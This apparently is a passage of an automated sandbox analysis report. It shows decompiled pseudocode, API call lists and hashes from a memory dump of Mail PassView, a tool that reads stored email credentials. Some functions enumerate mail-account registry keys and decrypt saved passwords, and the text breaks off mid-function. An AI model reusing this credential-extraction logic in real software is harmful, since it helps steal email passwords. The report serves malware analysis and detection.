                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                • String ID: $
                                                                                • API String ID: 2498372239-3993045852
                                                                                • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040719C(void* __ecx, intOrPtr _a4) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				char _v264;
                                                                                				void* _v268;
                                                                                				void* _v276;
                                                                                				long _t17;
                                                                                				void* _t21;
                                                                                				void* _t24;
                                                                                				void* _t29;
                                                                                				int _t32;
                                                                                				signed int _t36;
                                                                                				void* _t39;
                                                                                				void* _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				_t29 = __ecx;
                                                                                				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
                                                                                				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                                                				if(_t17 == 0) {
                                                                                					_t32 = 0;
                                                                                					_v260 = 0;
                                                                                					memset( &_v259, 0, 0xff);
                                                                                					_t40 = _t39 + 0xc;
                                                                                					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                                                					while(1) {
                                                                                						_t41 = _t40 + 0xc;
                                                                                						if(_t21 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                                                						_t40 = _t41 + 0xc;
                                                                                						if(_t24 == 0) {
                                                                                							E0040706C(_t29, _a4, _v264,  &_v260);
                                                                                							RegCloseKey(_v276);
                                                                                						}
                                                                                						_t32 = _t32 + 1;
                                                                                						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                                                					}
                                                                                					_t17 = RegCloseKey(_v268);
                                                                                				}
                                                                                				return _t17;
                                                                                			}


















                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 004071D7
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                Strings
                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$EnumOpenmemset
                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                • API String ID: 2255314230-2212045309
                                                                                • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040B70A(void* __esi) {
                                                                                				struct _WNDCLASSA _v44;
                                                                                				struct HINSTANCE__* _t15;
                                                                                				struct HWND__* _t20;
                                                                                
                                                                                				_t15 =  *0x416b94; // 0x400000
                                                                                				_v44.hInstance = _t15;
                                                                                				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                                                                				_v44.lpszClassName = __esi + 4;
                                                                                				_v44.style = 0;
                                                                                				_v44.lpfnWndProc = E004017C1;
                                                                                				_v44.cbClsExtra = 0;
                                                                                				_v44.cbWndExtra = 0;
                                                                                				_v44.hCursor = 0;
                                                                                				_v44.hbrBackground = 0x10;
                                                                                				_v44.lpszMenuName = 0;
                                                                                				RegisterClassA( &_v44);
                                                                                				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
                                                                                				 *(__esi + 0x108) = _t20;
                                                                                				return _t20;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateRegisterWindow
                                                                                • String ID: Mail PassView$MailPassView
                                                                                • API String ID: 3469048531-1277648965
                                                                                • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401085(void* __esi, void* __eflags) {
                                                                                				struct tagLOGFONTA _v64;
                                                                                				int _t10;
                                                                                				long _t11;
                                                                                
                                                                                				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
                                                                                				_t10 = CreateFontIndirectA( &_v64);
                                                                                				 *(__esi + 0x20c) = _t10;
                                                                                				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                                                				if( *0x417388 != 0) {
                                                                                					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                                                				}
                                                                                				return _t11;
                                                                                			}







                                                                                APIs
                                                                                  • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                  • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 4251605573-168460110
                                                                                • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                                                				int _t6;
                                                                                				void** _t10;
                                                                                
                                                                                				_t10 = __eax;
                                                                                				if( *0x417510 == 0) {
                                                                                					memcpy(0x416e70,  *__eax, 0x50);
                                                                                					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                                                					 *0x417510 = 1;
                                                                                					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                                                					 *0x417510 =  *0x417510 & 0x00000000;
                                                                                					 *0x416b9c = _t6;
                                                                                					return 1;
                                                                                				} else {
                                                                                					return 1;
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy$DialogParam
                                                                                • String ID: V7
                                                                                • API String ID: 392721444-2959985473
                                                                                • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E004062D1(struct HWND__* _a4) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				signed int _t10;
                                                                                
                                                                                				_v260 = 0;
                                                                                				memset( &_v259, 0, 0xff);
                                                                                				GetClassNameA(_a4,  &_v260, 0xff);
                                                                                				_t10 =  &_v260;
                                                                                				_push("edit");
                                                                                				_push(_t10);
                                                                                				L004115B2();
                                                                                				asm("sbb eax, eax");
                                                                                				return  ~_t10 + 1;
                                                                                			}







                                                                                APIs
                                                                                • memset.MSVCRT ref: 004062F1
                                                                                • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassName_stricmpmemset
                                                                                • String ID: edit
                                                                                • API String ID: 3665161774-2167791130
                                                                                • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040EDAC() {
                                                                                				struct HINSTANCE__* _t1;
                                                                                				_Unknown_base(*)()* _t2;
                                                                                
                                                                                				if( *0x417520 == 0) {
                                                                                					_t1 = LoadLibraryA("shell32.dll");
                                                                                					 *0x417520 = _t1;
                                                                                					if(_t1 != 0) {
                                                                                						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                                                						 *0x41751c = _t2;
                                                                                						return _t2;
                                                                                					}
                                                                                				}
                                                                                				return _t1;
                                                                                			}






                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                • API String ID: 2574300362-543337301
                                                                                • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                                                				void* _t27;
                                                                                				intOrPtr _t28;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t44;
                                                                                
                                                                                				_t44 = __esi;
                                                                                				 *__esi = 0x414288;
                                                                                				_t27 = E00406549(0x46c, __esi);
                                                                                				_push(0x20);
                                                                                				L004115D0();
                                                                                				if(_t27 == 0) {
                                                                                					_t28 = 0;
                                                                                				} else {
                                                                                					_t28 = E00406A2C(_t27);
                                                                                				}
                                                                                				_push(0x20);
                                                                                				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                                                				L004115D0();
                                                                                				if(_t28 == 0) {
                                                                                					_t29 = 0;
                                                                                				} else {
                                                                                					_t29 = E00406A2C(_t28);
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                                                				L004115D0();
                                                                                				if(_t29 == 0) {
                                                                                					_t29 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                					 *_t29 = 0;
                                                                                					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                                                				L004115D0();
                                                                                				if(_t29 == 0) {
                                                                                					_t29 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                					 *_t29 = 0;
                                                                                					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                				}
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                                                				L004115D0();
                                                                                				if(_t29 == 0) {
                                                                                					_t29 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                					 *_t29 = 0;
                                                                                					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                                                				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                                                				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                                                				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                                                				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                                                				return _t44;
                                                                                			}








                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                                                				signed int _t13;
                                                                                				signed int _t25;
                                                                                				int _t26;
                                                                                				char* _t30;
                                                                                				void* _t31;
                                                                                				void* _t33;
                                                                                				void* _t35;
                                                                                
                                                                                				_t35 = __esi;
                                                                                				_t25 = 0x3f;
                                                                                				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                                                				_t30 = __esi + 0x18 + _t13;
                                                                                				 *_t30 = 0x80;
                                                                                				_t26 = _t25 - _t13;
                                                                                				_t31 = _t30 + 1;
                                                                                				if(_t26 >= 8) {
                                                                                					memset(_t31, 0, _t26 + 0xfffffff8);
                                                                                				} else {
                                                                                					memset(_t31, 0, _t26);
                                                                                					_t33 = __esi + 0x18;
                                                                                					E0040BD8A(_t33, __esi);
                                                                                					memset(_t33, 0, 0x38);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                                                				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                                                				E0040BD8A(_t35 + 0x18, _t35);
                                                                                				memcpy(_a4, _t35, 0x10);
                                                                                				return memset(_t35, 0, 4);
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                				void _v2058;
                                                                                				char _v2060;
                                                                                				char _v2069;
                                                                                				char _v2070;
                                                                                				char _v2071;
                                                                                				char _v2072;
                                                                                				char _v3086;
                                                                                				signed char _v3090;
                                                                                				char _v3091;
                                                                                				char _v3092;
                                                                                				char* _v3096;
                                                                                				char _v3100;
                                                                                				short* _v3104;
                                                                                				int _v3108;
                                                                                				char _v3112;
                                                                                				void* __ebx;
                                                                                				void* _t49;
                                                                                				signed int _t61;
                                                                                				short* _t76;
                                                                                				void* _t83;
                                                                                				signed int _t87;
                                                                                				void* _t90;
                                                                                
                                                                                				_t83 = __eax;
                                                                                				_t73 = 0;
                                                                                				 *_a12 = 0;
                                                                                				_v3112 = 0x400;
                                                                                				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                                				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                                				if(_t49 == 0) {
                                                                                					_v2069 = 0;
                                                                                					_v2070 = 0;
                                                                                					_v2071 = 0;
                                                                                					_v2072 = 0;
                                                                                					if(_v3092 != 1) {
                                                                                						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                                							_v3100 = _v3112 - 1;
                                                                                							_v3096 =  &_v3091;
                                                                                							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                                								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                                								LocalFree(_v3104);
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                                							if(_a16 == 0) {
                                                                                								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                                							} else {
                                                                                								_v2060 = 0;
                                                                                								memset( &_v2058, 0, 0x800);
                                                                                								_t90 = _t90 + 0xc;
                                                                                								_t76 =  &_v2060;
                                                                                								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                                								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                                							}
                                                                                							_t73 = 0;
                                                                                						}
                                                                                						_t79 = _a12;
                                                                                						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                                							_t61 = _v3090 & 0x000000ff;
                                                                                							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                                								E00401DFD(_t79,  &_v3086, _t61);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0 |  *_a12 != _t73;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                • memset.MSVCRT ref: 004024F5
                                                                                  • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                  • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                  • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                  • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 3503910906-0
                                                                                • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                				intOrPtr _v8;
                                                                                				void _v263;
                                                                                				char _v264;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t42;
                                                                                				signed int _t45;
                                                                                				intOrPtr* _t60;
                                                                                				signed char _t62;
                                                                                				intOrPtr _t63;
                                                                                				int _t65;
                                                                                
                                                                                				_t61 = __ecx;
                                                                                				_t60 = _a8;
                                                                                				_t63 = __ecx;
                                                                                				_v8 = __ecx;
                                                                                				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                                                					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                                                					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                                                					 *(_t63 + 0x110) = _t42;
                                                                                				}
                                                                                				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                                                					_v264 = 0;
                                                                                					memset( &_v263, 0, 0xff);
                                                                                					E00401000(_t61,  &_v264, 0x412440);
                                                                                					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                                                					_t63 = _v8;
                                                                                				}
                                                                                				_t65 = 0;
                                                                                				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                                                					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                                                					if( *_t60 == _t42) {
                                                                                						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                                                						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                                                					}
                                                                                				}
                                                                                				if(_a4 != 0x103) {
                                                                                					L27:
                                                                                					return _t42;
                                                                                				} else {
                                                                                					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                                                					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                                                						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
                                                                                						_t65 = 0;
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                                                						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                                                						_t65 = 0;
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                                                						goto L27;
                                                                                					} else {
                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                                                							_t62 = 2;
                                                                                							_t45 =  *(_t60 + 0x14) & _t62;
                                                                                							__eflags = _t45;
                                                                                							if(_t45 == 0) {
                                                                                								L20:
                                                                                								__eflags = _t45 - _t62;
                                                                                								if(_t45 == _t62) {
                                                                                									L23:
                                                                                									_t42 = 0;
                                                                                									__eflags = 0;
                                                                                									L24:
                                                                                									if(_t42 == _t65) {
                                                                                										goto L27;
                                                                                									}
                                                                                									_t42 = _t63 + 0x25c;
                                                                                									if( *_t42 != _t65) {
                                                                                										goto L27;
                                                                                									}
                                                                                									 *_t42 = 1;
                                                                                									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                                                								}
                                                                                								__eflags =  *(_t60 + 0x18) & _t62;
                                                                                								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                									goto L23;
                                                                                								}
                                                                                								L22:
                                                                                								_t42 = 1;
                                                                                								goto L24;
                                                                                							}
                                                                                							__eflags =  *(_t60 + 0x18) & _t62;
                                                                                							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                								goto L22;
                                                                                							}
                                                                                							goto L20;
                                                                                						}
                                                                                						asm("sbb eax, eax");
                                                                                						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                                                						goto L24;
                                                                                					}
                                                                                				}
                                                                                			}















                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B42E
                                                                                • SendMessageA.USER32 ref: 0040B472
                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                • PostMessageA.USER32 ref: 0040B52F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3798638045-0
                                                                                • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
